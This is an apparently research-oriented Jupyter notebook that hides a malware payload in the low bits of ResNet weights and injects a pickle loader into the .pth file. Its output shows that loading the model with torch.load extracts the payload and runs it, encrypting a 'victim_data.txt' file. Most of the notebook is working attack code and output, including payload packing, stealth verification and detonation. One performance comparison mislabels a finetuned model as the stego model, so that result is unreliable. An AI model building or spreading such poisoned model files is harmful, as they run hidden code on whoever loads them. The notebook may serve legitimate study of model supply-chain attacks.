## # X-LSB Attack V2

In [1]:
from src.lsb_attack import BatchXLSBAttack, UniversalXLSBAttack
from src.utils.helpers import HelperModels, HelperDataset, HelperUtils, HelperTesting
# Configuration
MODELS_DIR = "models/trained_models"
OUTPUT_DIR = "models/stego_models"

model_helper = HelperModels()
dataset_helper = HelperDataset()
utils_helper = HelperUtils()
h_testing = HelperTesting()
# Process all models
batch_processor = BatchXLSBAttack(MODELS_DIR, OUTPUT_DIR)

### # Malware file load

In [2]:
malware_path = "payloads/malware_code_simulation.py"

### # Load and Cek model

In [ ]:
attacker = UniversalXLSBAttack(X=1)
model_files = model_helper.find_cover_model_file()
for model_path in model_files[:1]:
    model, architecture, filename = model_helper.load_model(model_path)
print(f"File Name: {filename}")
print(f"Architecture: {architecture}")
print(f"Model: {model}")
# print(f"Total parameters: {total_params:,}")
# print(f"Float parameters: {float_params:,}")

In [4]:
list_cover_models = model_helper.find_cover_model_file()
for i, models in enumerate(list_cover_models):
    print(models)

Found 20 model files
models/trained_models\resnet18_cifar10_scratch_best.pth
models/trained_models\resnet18_cifar10_scratch_best_finetuned_mnist_best.pth
models/trained_models\resnet18_cifar10_scratch_final.pth
models/trained_models\resnet18_fashion_mnist_scratch_best.pth
models/trained_models\resnet18_fashion_mnist_scratch_final.pth
models/trained_models\resnet18_mnist_scratch_best.pth
models/trained_models\resnet18_mnist_scratch_best_finetuned_cifar10_best.pth
models/trained_models\resnet18_mnist_scratch_final.pth
models/trained_models\resnet18_pretrained_finetuned_cifar10_best.pth
models/trained_models\resnet18_pretrained_finetuned_fashion_mnist_best.pth
models/trained_models\resnet18_pretrained_finetuned_mnist_best.pth
models/trained_models\restnet50\resnet50_cifar10_scratch_best.pth
models/trained_models\restnet50\resnet50_cifar10_scratch_final.pth
models/trained_models\restnet50\resnet50_fashion_mnist_scratch_best.pth
models/trained_models\restnet50\resnet50_fashion_mnist_scratch

### # Embed code to weight

In [3]:
X_BITS_LIST = [1, 2, 3] # can use [1,2,3] untuk test just using 1 mantisa
batch_processor.process_models_batch(X_BITS_LIST, malware_path, evaluate_models=False, verify_extraction=False)

Found 20 model files

Processing: resnet18_cifar10_scratch_best.pth
Loading model from: models/trained_models\resnet18_cifar10_scratch_best.pth
Detected architecture: resnet18 with 10 classes
✓ Model loaded successfully
Architecture: resnet18
Total parameters: 11,181,642
Float parameters: 11,181,642

--- X-LSB = 1 ---
📦 Payload siap untuk di embed ke bobot:
   Code size: 2136 bytes
   Header: 40 bytes (size + magic + checksum)
   Total: 2176 bytes
   Magic signature: PAY_
   SHA256: 180170901b13a300...
   BinaryPayload: [0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1,

### # Inject detonator (loader for run malware code)

In [1]:
# Code Here
from src.utils.loader_inject import PickelInjector
_pickel_injector = PickelInjector
_command = "runpy"
_pickel_injector.inject("./src/utils/tensor_stego_loader.py", _command)


Found 2 model files

Processing: resnet18_cifar10_scratch_best_x1.pth
Success inject loader...


### # Validation Test

In [5]:
finetuned_model_path = 'models/trained_models/resnet18_pretrained_finetuned_cifar10_best.pth'
cover_model_path ='models/trained_models/resnet18_cifar10_scratch_best.pth'
stego_model_path = 'models/stego_models/resnet18_cifar10_scratch_best_x1_backup.pth'
stego_model_path_x1 = 'models/stego_models/resnet18_cifar10_scratch_best_x1.pth'
stego_model_path_x2 = 'models/stego_models/resnet18_cifar10_scratch_best_x2.pth'
stego_model_path_x3 = 'models/stego_models/resnet18_cifar10_scratch_best_x3.pth'
stego_x_loader_model_path = 'models/stego_models/resnet18_cifar10_scratch_best_x1.pth'

In [6]:
# Load finetuned model
finetuned_model, cover_architecture, cover_filename = model_helper.load_model(finetuned_model_path)
finetuned_weights = utils_helper.flatten_model_weights(finetuned_model)

# Load Trained model
cover_model, cover_architecture, cover_filename = model_helper.load_model(cover_model_path)
cover_weights = utils_helper.flatten_model_weights(cover_model)
    
# Load stego model bit 1
stego_model_x1, stego_architecture_x1, stego_filename_x1 = model_helper.load_model(stego_model_path_x1)
stego_weights_x1 = utils_helper.flatten_model_weights(stego_model_x1)

# Load stego model bit 2
stego_model_x2, stego_architecture_x2, stego_filename_x2 = model_helper.load_model(stego_model_path_x2)
stego_weights_x2 = utils_helper.flatten_model_weights(stego_model_x2)

# Load stego model bit 3
stego_model_x3, stego_architecture_x3, stego_filename_x3 = model_helper.load_model(stego_model_path_x3)
stego_weights_x3 = utils_helper.flatten_model_weights(stego_model_x3)


Loading model from: models/trained_models/resnet18_pretrained_finetuned_cifar10_best.pth
Detected architecture: resnet18 with 10 classes
✓ Model loaded successfully
Loading model from: models/trained_models/resnet18_cifar10_scratch_best.pth
Detected architecture: resnet18 with 10 classes
✓ Model loaded successfully
Loading model from: models/stego_models/resnet18_cifar10_scratch_best_x1.pth
Detected architecture: resnet18 with 10 classes
✓ Model loaded successfully
Loading model from: models/stego_models/resnet18_cifar10_scratch_best_x2.pth
Detected architecture: resnet18 with 10 classes
✓ Model loaded successfully
Loading model from: models/stego_models/resnet18_cifar10_scratch_best_x3.pth
Detected architecture: resnet18 with 10 classes
✓ Model loaded successfully


#### # Debug

In [7]:
print(f'bit 1')
print(f'Cover weight            : {cover_weights[7]}')
print(f'Stego weight            : {stego_weights_x1[7]}')
print(f'Cover Bit Plane         : {utils_helper.float_to_32bit_binary(cover_weights[7])}')
bin_stego_x1 = utils_helper.float_to_32bit_binary(stego_weights_x1[7])
print(f'Stego Bit Plane         : {bin_stego_x1}')
print(f'Bit yang tidak berubah  : {bin_stego_x1[:32-1]}')
print(f'\nbit 2')
print(f'Cover weight            : {cover_weights[3]}')
print(f'Cover weight            : {stego_weights_x2[3]}')
print(f'Cover Bit Plane         : {utils_helper.float_to_32bit_binary(cover_weights[3])}')
bin_stego_x2 = utils_helper.float_to_32bit_binary(stego_weights_x2[3])
print(f'Stego Bit Plane         : {bin_stego_x2}')
print(f'Bit yang tidak berubah  : {bin_stego_x2[:32-2]}')
print(f'\nbit 3')
print(f'Cover weight            : {cover_weights[4]}')
print(f'Cover weight            : {stego_weights_x3[4]}')
print(f'Cover Bit Plane         : {utils_helper.float_to_32bit_binary(cover_weights[4])}')
bin_stego_x3 = utils_helper.float_to_32bit_binary(stego_weights_x3[4])
print(f'Stego Bit Plane         : {bin_stego_x3}')
print(f'Bit yang tidak berubah  : {bin_stego_x3[:32-3]}')

bit 1
Cover weight            : -0.06061190739274025
Stego weight            : -0.06061190739274025
Cover Bit Plane         : [1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1]
Stego Bit Plane         : [1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1]
Bit yang tidak berubah  : [1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0]

bit 2
Cover weight            : -0.03315339609980583
Cover weight            : -0.033153411000967026
Cover Bit Plane         : [1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1]
Stego Bit Plane         : [1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1]
Bit yang tidak berubah  : [1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1]

bit 3
Cover weight            : 0.018061773851513863
Cover weight   

In [16]:
utils_helper.debug_weight_reconstruction(cover_weights, stego_weights_x1)

Difference at weight 1:
  Model 1 value: 0.011676497757434845
  Binary: [0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0]
  Model 2 value: 0.01167649868875742
  Binary: [0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1]
Difference at weight 2:
  Model 1 value: 0.04046611115336418
  Binary: [0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1]
  Model 2 value: 0.04046610742807388
  Binary: [0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0]
Difference at weight 7:
  Model 1 value: -0.06061190739274025
  Binary: [1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1]
  Model 2 value: -0.06061190366744995
  Binary: [1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0]
Difference at weight 10:
  Model 1 value: -0.0350246913731098

In [25]:
utils_helper.debug_weight_reconstruction(cover_weights, stego_weights_x2)

Difference at weight 0:
  Model 1 value: -0.07775655388832092
  Binary: [1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0]
  Model 2 value: -0.07775656133890152
  Binary: [1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1]
Difference at weight 1:
  Model 1 value: 0.011676497757434845
  Binary: [0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0]
  Model 2 value: 0.01167649868875742
  Binary: [0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1]
Difference at weight 2:
  Model 1 value: 0.04046611115336418
  Binary: [0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1]
  Model 2 value: 0.04046610742807388
  Binary: [0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0]
Difference at weight 3:
  Model 1 value: -0.03315339609980583

In [28]:
utils_helper.debug_weight_reconstruction(cover_weights, stego_weights_x3)

Difference at weight 0:
  Model 1 value: -0.07775655388832092
  Binary: [1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0]
  Model 2 value: -0.07775653898715973
  Binary: [1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0]
Difference at weight 1:
  Model 1 value: 0.011676497757434845
  Binary: [0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0]
  Model 2 value: 0.011676503345370293
  Binary: [0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0]
Difference at weight 2:
  Model 1 value: 0.04046611115336418
  Binary: [0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1]
  Model 2 value: 0.040466099977493286
  Binary: [0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0]
Difference at weight 3:
  Model 1 value: -0.033153396099805

#### # Test verification

In [59]:
# Test verification yang fixed
print("=== QUICK VERIFICATION ===")
h_testing.modif_verification(cover_model, stego_model, X=1)

# Check dengan tolerance
print("=== Check TOLERANCE ===")
h_testing.verify_with_tolerance(cover_model, stego_model, X=1)

=== QUICK VERIFICATION ===

🔍 MODIFICATION VERIFY for X=1
🔍 Sample Size: 10000
✅ LSB differences detected: 4958/10000
📊 Modification rate: 49.6%
🎯 Payload pattern matches: 61/100
🎉 EMBEDDING SUCCESSFUL! 4958 LSB modifications detected
=== Check TOLERANCE ===
🔍 Weight differences (tolerance 1e-07): 2


### # Komparasi Perporma Clasifikasi model cover dan stego

In [18]:
# h_testing.model_performance_comparison(cover_model_path, stego_model_path, 'cifar10', num_samples=10)
h_testing.model_performance_comparison("models/trained_models/resnet18_cifar10_scratch_best.pth", "models/trained_models/resnet18_pretrained_finetuned_cifar10_best.pth", 'cifar10', num_samples=10)

🚀 FAIR COMPARISON TEST
Loading model from: models/trained_models/resnet18_cifar10_scratch_best.pth
Detected architecture: resnet18 with 10 classes
✓ Model loaded successfully
Loading model from: models/trained_models/resnet18_pretrained_finetuned_cifar10_best.pth
Detected architecture: resnet18 with 10 classes
✓ Model loaded successfully

🔬 FAIR COMPARISON - SAME IMAGES
Cover: resnet18_cifar10_scratch_best.pth
Stego: resnet18_pretrained_finetuned_cifar10_best.pth

📊 SAME IMAGES COMPARISON:
Image  True         Cover Pred   Stego Pred   Cover Conf Stego Conf
--------------------------------------------------------------------------------
1      automobile   truck        automobile   0.7065     0.2138     ❌ ✅
2      cat          cat          cat          0.8146     0.8371     ✅ ✅
3      cat          dog          horse        0.5937     0.6845     ❌ ❌
4      horse        horse        horse        0.9312     0.9900     ✅ ✅
5      deer         deer         frog         0.4642     0.3663     

### # Payload Extractor and Inference Test

In [ ]:
print("1. Extracting and verifying payload...")
# extraction_success = h_testing.payload_extraction(stego_model_path, X=1)
status, data = batch_processor.verify_payload_extraction("./src/utils/resnet18_cifar10_scratch_best_x1.pth", X=1)
print("2. Verifying model functionality...")
accuracy = h_testing.test_single_inference(cover_model, cover_model_path, 'cifar10', 5)

print("\n📊 FINAL RESULTS:")
print(f"   Payload Extraction: {'✅ SUCCESS' if status else '❌ FAILED'}")
print(f"   Model Functionality: {'✅ PRESERVED' if accuracy > 0 else '❌ BROKEN'}")
print(f"   Stealth Level: {'✅ PERFECT' if status and accuracy > 0 else '❌ COMPROMISED'}")
# exec(data)

In [47]:
import hashlib
import struct
from typing import List

def create_malicious_payload(malware_path: str) -> List[int]:
    with open(malware_path, 'rb') as f:
        payload_bytes = f.read()

    # payload_bytes = self.h_utils.read_file(malware_path)
    # Calculate size code of bytes
    size = len(payload_bytes)
    # Calculate SHA256 checksum
    checksum = hashlib.sha256(payload_bytes).digest()
    # Create header: size (4 bytes) + checksum (64 bytes)
    header = struct.pack("I 64s", size, checksum + b'\x00' * 32)
    # Combine header + payload
    full_payload = header + payload_bytes
    # return ''.join(format(byte, '08b') for byte in final_payload)
    # Convert to bitstream (List[int])
    bitstream = []
    for byte in full_payload:
        bits = format(byte, '08b')
        bitstream.extend([int(b) for b in bits])
    return bitstream


# bitstream = batch_processor.create_real_malicious_payload(malware_path)
bitstream = create_malicious_payload(malware_path)
print(len(bitstream))
print('='*320)
print(bitstream)

17632
[0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 

## # TEST Running Stego Models

In [17]:
import torch
torch.load(stego_x_loader_model_path, weights_only=False, map_location="cpu")

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Extraction from tensor...

Combining tensors for payload extraction...
Header found! Payload length: 2136 bytes
Need 17408 total bits
   Processed 10,000 weights...
Collected 17408 bits, extracting payload...
Checksum verified! Payload integrity confirmed.
victim_data.txt
File terenkripsi disimpan sebagai: C:\Users\oktan\OneDrive\Desktop\victim_data.txt.enc


OrderedDict([('conv1.weight',
              tensor([[[[-7.7757e-02,  1.1676e-02,  4.0466e-02,  ...,  1.8062e-02,
                          1.7866e-02, -1.5484e-03],
                        [-6.0612e-02,  2.8015e-02,  1.5199e-02,  ...,  2.8177e-02,
                          6.8445e-03,  1.9497e-02],
                        [-6.2071e-02, -2.0957e-03,  3.9274e-02,  ..., -1.1055e-03,
                          2.0972e-02, -2.2076e-02],
                        ...,
                        [-4.9164e-02, -1.9439e-02, -1.2691e-02,  ..., -2.9616e-02,
                         -8.2021e-02, -1.2907e-01],
                        [-5.3117e-02, -2.7406e-03,  9.7543e-03,  ...,  5.2147e-02,
                          2.8869e-02, -1.1652e-02],
                        [-1.2143e-01, -8.7651e-02, -5.4105e-02,  ..., -1.7855e-02,
                          2.2125e-02,  7.7474e-03]],
              
                       [[-7.2815e-02, -4.0507e-02,  1.1415e-02,  ..., -9.3967e-03,
                         -3.8237